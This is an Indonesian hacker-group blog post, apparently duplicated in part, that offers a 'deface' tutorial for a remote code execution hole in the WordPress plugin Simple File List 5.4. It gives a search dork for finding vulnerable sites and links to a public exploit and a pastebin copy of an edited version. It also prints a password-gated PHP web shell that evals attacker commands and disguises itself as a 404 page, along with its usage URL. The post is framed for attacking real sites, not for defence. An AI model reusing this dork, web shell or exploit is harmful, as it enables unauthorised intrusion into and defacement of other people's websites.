Tutorial Deface 2021 WordPress Plugin Simple File List 5.4 - Remote Code Execution
Assalamualaikum Sob!!
kesini lagi di Blog DestroySquad !
kali ini membahas RCE (Remote Code Execution)
Skuy langsung aje
Exploit : https://www.exploit-db.com/exploits/48349
Dork : /wp-content/uploads/simple-file-list/
payload bawaan :
Exec : localhost/shell.php?cmd=command
awalnya gw pake AntSword, kek Di Postingan Joomla Configuration RCE
malah Connection Failed kan anjg kan :v
yaudah gw edit aja Payloadnya.
soalnya kalo bawaan menurut w ribet Muehehe..
Ohh iye Nih Exploitnya
Sekian dari gw, Crusher. semoga bermanfaat :v
Thank's
Wassalamualaikum.
kesini lagi di Blog DestroySquad !
kali ini membahas RCE (Remote Code Execution)
Skuy langsung aje
Exploit : https://www.exploit-db.com/exploits/48349
Dork : /wp-content/uploads/simple-file-list/
payload bawaan :
payload = '<?php if($_POST["password"]=="' + password + \
'"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>' 
Exec : localhost/shell.php?cmd=command
awalnya gw pake AntSword, kek Di Postingan Joomla Configuration RCE
malah Connection Failed kan anjg kan :v
yaudah gw edit aja Payloadnya.
soalnya kalo bawaan menurut w ribet Muehehe..
Ohh iye Nih Exploitnya
https://pastebin.com/zjhfZ91M
Sekian dari gw, Crusher. semoga bermanfaat :v
Thank's
Wassalamualaikum.
